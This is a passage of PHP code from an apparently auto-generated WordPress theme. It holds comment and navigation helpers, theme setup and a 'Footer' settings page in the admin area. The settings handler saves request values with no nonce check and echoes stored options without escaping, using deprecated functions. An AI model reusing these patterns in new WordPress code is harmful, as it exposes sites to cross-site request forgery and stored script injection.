    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s - %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
